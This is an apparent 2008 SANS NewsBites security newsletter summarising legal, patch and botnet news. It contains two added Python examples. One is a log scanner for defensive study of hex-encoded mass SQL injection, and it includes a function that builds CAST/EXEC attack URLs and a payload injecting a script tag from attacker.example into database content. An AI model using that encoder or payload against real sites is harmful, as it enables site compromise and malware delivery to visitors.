SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.
Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.
Volume X - Issue #70
September 05, 2008
An especially interesting issue, particularly the Top of the News
section. But the story under UPDATES AND PATCHES about VMware
vulnerabilities also deserves a close read. You can use it to help
catalyze your testing of whether your virtual systems are as actively
patched as your operating systems.
TOP OF THE NEWS
ABA Resoundingly Says No PI Licenses For Computer Forensics
Judges Question Constitutionality of Gag Orders Accompanying National Security Letters
Former Professor Convicted of Arms Export Control Act Violations
UK Consumer Groups Call on European Commission to Require Companies to Make Data Breaches Public
Researchers Develop Heartbeat-Based Encryption for Implanted Medical Devices
THE REST OF THE WEEK'S NEWS
LEGAL ISSUES
Guilty Verdict in Filesharing Case Prompted by Evidence Tampering
Chrome Gets Some Dents
UPDATES AND PATCHES
September's Patch Tuesday Will Include Four Critical Bulletins
VMware Issues Fixes for Multiple Vulnerabilities
STUDIES AND STATISTICS
Zombie Networks Growing
Privacy Notices are Too Complicated
Smart Phones Pose New Challenges for Digital Forensic Investigators
Surveillance Cameras a Boon to Crime Fighting in Newark
*********** Sponsored By SANS SCADA Security Summit *******************
Hear about the most critical vulnerabilities in Control Systems and the findings from the National SCADA Test Bed and Control Systems Security Project from a national laboratory. Also register for Control Systems Cyber Security Training. SANS Process Control and SCADA Summit September 8-9 - Amsterdam, NL. http://www.sans.org/info/32819
- - NETWORK SECURITY 2008: Las Vegas (9/28-10/6) 50 courses; big tools expo; lots of evening sessions: http://www.sans.org/ns2008
- - Chicago (9/3-9/10) http://www.sans.org/chicago08 AUDIT & COMPLIANCE
- - Monterey (10/31-11/6) http://www.sans.org/info/30738
- - Sydney Australia (10/27-11/1) http://www.sans.org/sydney08/
- - Vancouver (11/17-11/22) http://www.sans.org/vancouver08/
and in 100 other cities and online any time: www.sans.org
TOP OF THE NEWS
ABA Resoundingly Says No PI Licenses For Computer Forensics (August 28, 2008)
At its annual meeting in August, the American Bar Association spoke strongly to the states on the inadvisability of requiring those who perform computer forensics services to obtain a private investigator's license.
Judges Question Constitutionality of Gag Orders Accompanying National Security Letters (August 28, 2008)
A panel of three judges from the US Second Circuit Court of Appeals heard arguments in a case involving the constitutionality of gag orders that often accompany National Security Letters sent by the FBI. Recipients of the letters, which seek information pertaining to investigations, are prohibited from making their receipt public. The case is before the court because the US government is appealing a lower court ruling that said the gag order violated the constitutional guarantee of free speech. The original case was brought by the American Civil Liberties Union (ACLU) on behalf of a small, unnamed internet service provider.
Former Professor Convicted of Arms Export Control Act Violations (September 3 & 4, 2008)
University of Tennessee Professor Emeritus J. Reece Roth has been convicted on 18 charges of violating the Arms Export Control Act for sharing restricted technology with students from Iran and China. Roth allowed two graduate assistants access to data about a US Air Force defense project involving "plasma-based guidance systems for the wings of unmanned vehicles." Roth was also accused of taking reports and related studies on his laptop to China during a lecture tour in 2006, and of having one report e-mailed to him there through a Chinese professor's Internet connection. He could technically be sentenced to a maximum of 10 years for each of 16 violations and a maximum of five years for the other two, but it is likely he will receive a considerably shorter sentence, "including the possibility of probation."
UK Consumer Groups Call on European Commission to Require Companies to Make Data Breaches Public (September 2 & 3, 2008)
The UK's National Consumer Council (NCC) and other European consumer organizations have called upon the European Commission to introduce a law that would require companies that suffer data security breaches to acknowledge the incidents publicly. The measure's proponents say it would make companies employ stronger security measures to protect customer data. The NCC also wants the UK Information Commissioner's Office (ICO) to have increased powers, such as imposing fines for negligence related to data security breaches. The ICO has pointed out that determining the appropriate threshold for reporting breaches could be tricky; if every minor incident receives coverage, people could become inured to breach notices and stop paying attention.
[Editor's Note (Schultz): The ICO's position is one that would in effect create yet another "big brother" entity, something that would not be in the best interests of individuals who are potential victims of data security breaches. It would give authorities the power to withhold notifications about data security breaches on the grounds that the public could potentially be overwhelmed. Why not instead make all information available, but provide mechanisms that make it possible for individuals to create their own information filters if they so desire? ]
Researchers Develop Heartbeat-Based Encryption for Implanted Medical Devices (September 4, 2008)
Researchers from the Chinese University of Hong Kong have developed a method of encrypting implanted medical device signals that uses the patient's own heartbeat pattern as the encryption key. Because a person's heartbeat pattern fluctuates slightly over time, an attacker who recorded a heartbeat could not replay it at a later date.
************************** SPONSORED LINKS: *****************************
1) Attend the Forensics and Incident Response Summit October 13-14 in Las Vegas to learn about the latest tools and techniques. http://www.sans.org/info/32824
2) Free Content: SANS Analyst Program Whitepaper "Data Leakage Landscape" sponsored by Utimaco & Trend Micro http://www.sans.org/info/32829
3) Search IT security vendors by Defensive Wall categories in the SANS Buyers Guide for INFOSEC Professionals! http://www.sans.org/info/32834
THE REST OF THE WEEK'S NEWS
Guilty Verdict in Filesharing Case Prompted by Evidence Tampering (September 2, 2008)
A man in Arizona has been ordered to pay US $40,850 for copyright infringement. Jeffrey Howell had been set to stand trial for placing songs in a shared folder of the Kazaa filesharing program. However, the case will not go to trial because the judge agreed with the plaintiff's request for a verdict on the grounds that the defendant had tampered with and destroyed evidence. Howell formatted his computer's hard disk, ran a data deletion program and reinstalled the operating system even after he had been served the complaint against him.
[Editor's Note (Honan): Use this as impetus to ensure your e-discovery process communicates clearly to all employees what they can and cannot do with the data on their machines once you have been served with an e-discovery notice.]
Chrome Gets Some Dents (September 3, 2008)
People have already begun to find vulnerabilities in the beta version of Google Chrome, the company's new web browser. In one scenario, a flaw in the WebKit engine together with a flaw in Java could be used to trick users into downloading executable files. In another scenario, the browser could be crashed when users click on maliciously crafted links. Proof-of-concept code has been posted for both vulnerabilities.
[Editor's Note (Pescatore): Let's see: by my math, if you multiply the security level of consumer-grade software times the security level of beta code, you get a whole mess of vulnerabilities that will be easily exploited. That said, I would love to see more competition in the browser world drive browsers to simpler code bases with more focus on security as the top feature, vs. trying to bundle in email clients and all kinds of other stuff. (Schultz): For a nice, unbiased view of Chrome security, visit
UPDATES AND PATCHES
September's Patch Tuesday Will Include Four Critical Bulletins (September 4, 2008)
Microsoft will issue four security bulletins on Tuesday, September 9. The bulletins will address vulnerabilities in Microsoft Windows, Microsoft Office, Windows Media Player and Windows Media Encoder. All four bulletins have been given severity ratings of critical because each will fix at least one remote code execution flaw.
VMware Issues Fixes for Multiple Vulnerabilities (September 2, 2008)
VMware has issued patches to address at least 16 vulnerabilities in a number of its products, including VMware Workstation, VMware Player, VMware ACE, VMware Server and VMware ESX. The US Computer Emergency Readiness Team (US-CERT) has also issued a warning about the flaws, which could be exploited to "execute arbitrary code, cause a denial-of-service condition, access the system with elevated privileges, or obtain sensitive information."
STUDIES AND STATISTICS
Zombie Networks Growing (September 4, 2008)
According to statistics gathered by The Shadowserver Foundation, more than 450,000 personal computers are now part of zombie networks; three months ago, the number was just over 100,000. The Shadowserver Foundation believes the increase is due to the rising number of websites that have been manipulated through SQL injection attacks so that they infect the machines of users who visit them. While the number of compromised machines is rising, the number of command and control (C&C) servers is falling. The Shadowserver Foundation is a group of volunteers from the professional security world.
[Editor's Note (Schultz): Given the statistics released in the past, I suspect that 450,000 bot-infected computers is a gross underestimate. ]
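The SQL injection the item refers to is the mass-injection pattern of 2008: the injected SQL was hidden in hex inside CAST(0x... AS VARCHAR) so the request showed no obvious UPDATE or script tag, and the decoded statement appended a script tag to text columns so that every page built from the database served the infecting script. The script below is an added example for this newsletter, not Shadowserver's code or anything from the cited article; it assumes a common-log-format web server log, the log lines and the attacker hostname attacker.example are constructed, and the payload is a shortened stand-in for the cursor-driven statements the real campaigns used.

```python
"""Recover hex-encoded mass SQL injection payloads from web server logs.

Added example for the NewsBites item above; it is not Shadowserver's code
and the log lines are constructed.  The 2008 mass-injection campaigns hid
their SQL in CAST(0x... AS VARCHAR) so the query string showed no UPDATE or
<script>; once run against a vulnerable page, the decoded statement appended
a <script src=...> tag to text columns, so every page built from the database
then served the infecting script.
"""
import re
from urllib.parse import quote, unquote_plus

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
# CAST(0x<hex> AS [N]VARCHAR(n)): an N prefix means UTF-16LE text, otherwise
# single-byte text.  Case-insensitive because attackers varied the casing.
CAST_RE = re.compile(r"CAST\s*\(\s*0x([0-9a-fA-F]+)\s+AS\s+(N?)(?:VAR)?CHAR",
                     re.IGNORECASE)
SUSPICIOUS = re.compile(
    r"\b(UPDATE|EXEC|DECLARE|sysobjects|syscolumns)\b|<script", re.IGNORECASE)
SCRIPT_SRC_RE = re.compile(r'<script[^>]*src=["\']?([^"\'\s>]+)', re.IGNORECASE)


def decode_cast_payloads(text):
    """Return the decoded string of every CAST(0x... AS [N]VARCHAR) in text."""
    decoded = []
    for hexstr, n_prefix in CAST_RE.findall(text):
        if len(hexstr) % 2:          # tolerate a truncated log line
            hexstr = hexstr[:-1]
        raw = bytes.fromhex(hexstr)
        decoded.append(raw.decode("utf-16-le" if n_prefix else "latin-1",
                                  errors="replace"))
    return decoded


def inspect_url(url):
    """Return a finding dict for one request URL, or None if it looks benign."""
    text = unquote_plus(url)          # logs keep the percent-encoded form
    payloads = decode_cast_payloads(text)
    if not SUSPICIOUS.search(text) and not any(SUSPICIOUS.search(p) for p in payloads):
        return None
    srcs = [m.group(1) for p in payloads for m in SCRIPT_SRC_RE.finditer(p)]
    return {"url": url, "decoded": payloads, "script_src": srcs}


def scan_log(lines):
    """Run inspect_url over access-log lines; return the findings in order."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            finding = inspect_url(m.group(1))
            if finding:
                findings.append(finding)
    return findings


# --- constructed sample data (hostname and addresses are documentation values)
# A shortened stand-in for the injected statement: the real ones walked
# sysobjects/syscolumns with a cursor and appended the tag to every text column.
PAYLOAD = ("UPDATE [news] SET [body]=[body]+"
           "'<script src=\"http://attacker.example/ngg.js\"></script>';")


def build_attack_url(payload, nvarchar):
    """Encode payload the way the campaign did: hex inside CAST, after a ';'."""
    kind = "NVARCHAR" if nvarchar else "VARCHAR"
    hexstr = payload.encode("utf-16-le" if nvarchar else "latin-1").hex()
    tail = (f";DECLARE @S {kind}(4000);SET @S=CAST(0x{hexstr} AS {kind}(4000));"
            f"EXEC(@S);--")
    return "/news.asp?id=12" + quote(tail, safe="")


LOG_LINES = [
    '10.0.0.5 - - [03/Sep/2008:10:12:01 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5123',
    # "cast" as an ordinary search term must not trip the detector
    '10.0.0.9 - - [03/Sep/2008:10:12:02 +0000] "GET /search.asp?q=cast+iron HTTP/1.1" 200 811',
    f'198.51.100.7 - - [03/Sep/2008:10:12:03 +0000] "GET {build_attack_url(PAYLOAD, True)} HTTP/1.1" 200 5123',
    f'198.51.100.7 - - [03/Sep/2008:10:12:04 +0000] "GET {build_attack_url(PAYLOAD, False)} HTTP/1.1" 500 312',
]

if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        print(f["url"][:60] + "...")
        for p in f["decoded"]:
            print("  decoded:", p)
        print("  script src:", f["script_src"])
```

The decoded statement is what matters during response: it names the tables or columns touched and the script URL that every visitor was served, which is the indicator to block and the string to search the database for when cleaning up. Keyword filters on the raw request miss the interesting part, and a filter that blocks "cast" outright breaks legitimate searches, which is why the example decodes first and judges afterwards.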
Privacy Notices are Too Complicated (September 4, 2008)
Internet Service Providers' (ISP) privacy notices would benefit from simplified language, according to freelance writer Erik Sherman. Sherman ran the privacy policies of 23 ISPs through three different readability schemes. Of the policies, the simplest is Yahoo's, which requires the equivalent of a high school education; the most complicated, from Insight Communications, requires approximately 21 years of education, the equivalent of five years of graduate school. For the sake of comparison, Time magazine requires a ninth grade (US) reading level and the Atlantic Monthly requires a reading level commensurate with that of a college graduate. Several years ago, the US Securities and Exchange Commission (SEC) required that proxy statements about the compensation packages for executives of publicly held companies be written in readable English, which translates to a ninth-grade education.
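The item does not say which three readability schemes Sherman used. The script below is an added example for this newsletter, not Sherman's method: it assumes the Flesch-Kincaid grade level formula (0.39 * words per sentence + 11.8 * syllables per word - 15.59), whose output reads directly as years of US schooling, and it uses a vowel-group heuristic for syllables because exact syllable counts need a dictionary. The two notice fragments are constructed.

```python
"""Flesch-Kincaid grade level of privacy notice text.

Added example for the NewsBites item above, not Erik Sherman's method or
code.  Assumes the Flesch-Kincaid grade formula and a heuristic syllable
counter; the notice fragments below are constructed.
"""
import re

WORD_RE = re.compile(r"[A-Za-z]+(?:'[A-Za-z]+)?")
SENTENCE_SPLIT = re.compile(r"[.!?]+")
VOWEL_GROUP = re.compile(r"[aeiouy]+")


def count_syllables(word):
    """Heuristic syllable count: vowel groups, minus a trailing silent e."""
    w = word.lower()
    groups = len(VOWEL_GROUP.findall(w))
    # "notice" -> 2, while "simple"/"table" keep their final -le syllable
    if w.endswith("e") and not w.endswith("le") and groups > 1:
        groups -= 1
    return max(groups, 1)


def readability(text):
    """Return word, sentence and syllable counts plus the FK grade level."""
    sentences = [s for s in SENTENCE_SPLIT.split(text) if s.strip()]
    words = WORD_RE.findall(text)
    if not words or not sentences:
        raise ValueError("need at least one word and one sentence")
    syllables = sum(count_syllables(w) for w in words)
    grade = (0.39 * (len(words) / len(sentences))
             + 11.8 * (syllables / len(words)) - 15.59)
    return {"words": len(words), "sentences": len(sentences),
            "syllables": syllables, "grade": round(grade, 2)}


# Constructed fragments: a plain-language notice and a legalistic one.
SIMPLE = ("We collect your name and email. We do not sell it. "
          "You can ask us to delete it.")
COMPLEX = ("Notwithstanding the foregoing, personally identifiable information "
           "may be disclosed to affiliated entities pursuant to applicable "
           "regulatory requirements.")

if __name__ == "__main__":
    for label, text in (("simple", SIMPLE), ("complex", COMPLEX)):
        r = readability(text)
        print(f"{label}: grade {r['grade']} "
              f"({r['words']} words, {r['sentences']} sentences, {r['syllables']} syllables)")
```

The grade is driven by two things a policy writer controls: sentence length and word length. The long single-sentence fragment scores as post-graduate material while the short one scores at primary level, which is the gap the item describes between Yahoo's notice and Insight's.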
Smart Phones Pose New Challenges for Digital Forensic Investigators (September 3, 2008)
Keith Foggon, who heads the UK Serious Fraud Office's digital forensics unit, says that the increased use of mobile devices has created additional problems for those gathering digital forensic evidence. Criminals can remotely wipe evidence from smart phones. The unit addresses this problem by isolating confiscated devices immediately and not reconnecting them to their networks. However, because mobile devices evolve so rapidly, tools to help investigators access all the information the devices hold are not always readily available.
[Editors' Note (Schultz and Veltsos): Mr. Foggon's statements seem to indicate that he is not familiar with Paraben Forensics' line of mobile device forensics tools.]
Surveillance Cameras a Boon to Crime Fighting in Newark (August 25, 2008)
Newark (NJ) Mayor Cory Booker has deployed 111 surveillance cameras around the city as part of his goal to drastically reduce the rate of violent crime. The cameras are strategically placed in areas known to experience greater levels of crime. Some privacy advocates have expressed concern with the idea of public surveillance, saying, "The costs are high, and the benefits in terms of law enforcement are low." Newark's program has impressed organizations enough that they are moving facilities into Newark, where the rents are half what they are in nearby Manhattan. Murders in the city are down 40 percent over last year and shootings are down 19 percent. More than 100 arrests have been made based on videotaped evidence. The city has worked with the American Civil Liberties Union (ACLU) to establish parameters to protect citizens' privacy, including not allowing cameras to look inside people's homes and storing the recorded images for no more than 30 days.
[Editor's Comment (Northcutt): We live in an age where criminals pull the wiring out of streetlights to sell the copper to buy drugs, putting citizens at risk. What is done outside, on the streets, is public record and law enforcement has both the right, and arguably, responsibility, to monitor. (Veltsos): Newark with its 111 cameras and 280,000 people (4 cameras per 1,000 people) is a long way from London which boasts 71 cameras per 1,000 people. Interesting debate on CCTV - Panacea or Problem at
The Editorial Board of SANS NewsBites
Eugene Schultz, Ph.D., CISM, CISSP is CTO of High Tower Software and the author/co-author of books on Unix security, Internet security, Windows NT/2000 security, incident response, and intrusion detection and prevention. He was also the co-founder and original project manager of the Department of Energy's Computer Incident Advisory Capability (CIAC).
John Pescatore is Vice President at Gartner Inc.; he has worked in computer and network security since 1978.
Stephen Northcutt founded the GIAC certification and currently serves as President of the SANS Technology Institute, a post graduate level IT Security College, www.sans.edu.
Johannes Ullrich is Chief Technology Officer of the Internet Storm Center.
Howard A. Schmidt served as CSO for Microsoft and eBay and as Vice-Chair of the President's Critical Infrastructure Protection Board.
Ed Skoudis is co-founder of Intelguardians, a security research and consulting firm, and author and lead instructor of the SANS Hacker Exploits and Incident Handling course.
Tom Liston is a Senior Security Consultant and Malware Analyst for Intelguardians, a handler for the SANS Institute's Internet Storm Center, and co-author of the book Counter Hack Reloaded.
Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a senior Lockheed Martin Fellow.
Bruce Schneier has authored eight books -- including BEYOND FEAR and SECRETS AND LIES -- and dozens of articles and academic papers. Schneier has regularly appeared on television and radio, has testified before Congress, and is a frequent writer and lecturer on issues surrounding security and privacy.
Mason Brown is one of a very small number of people in the information security field who have held a top management position in a Fortune 50 company (Alcoa). He is leading SANS' global initiative to improve application security.
Marcus J. Ranum built the first firewall for the White House and is widely recognized as a security products designer and industry innovator.
Mark Weatherford, CISSP, CISM, is Executive Officer of the California Office of Information Security and Privacy Protection.
Alan Paller is director of research at the SANS Institute.
Clint Kreitner is the founding President and CEO of The Center for Internet Security.
Rohit Dhamankar is the Lead Security Architect at TippingPoint, a division of 3Com, and authors the critical vulnerabilities section of the weekly SANS Institute's @RISK newsletter and is the project manager for the SANS Top20 2005 and the Top 20 Quarterly updates.
Koon Yaw Tan is Assistant Director at Monetary Authority of Singapore (MAS) and a handler for the SANS Institute's Internet Storm Center.
Gal Shpantzer is a trusted advisor to several successful IT outsourcing companies and was involved in multiple SANS projects, such as the E-Warfare course and the Business Continuity Step-by-Step Guide.
Brian Honan is an independent security consultant based in Dublin, Ireland.
Dr. Christophe Veltsos, CISSP, CISA, GCFA teaches Information Security courses at Minnesota State University, Mankato. He is the President of Prudent Security LLC and also serves as the President of the Mankato Chapter ISSA.
Roland Grefer is an independent consultant based in Clearwater, Florida.
Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription, (and for free posters) or to update a current subscription, visit http://portal.sans.org/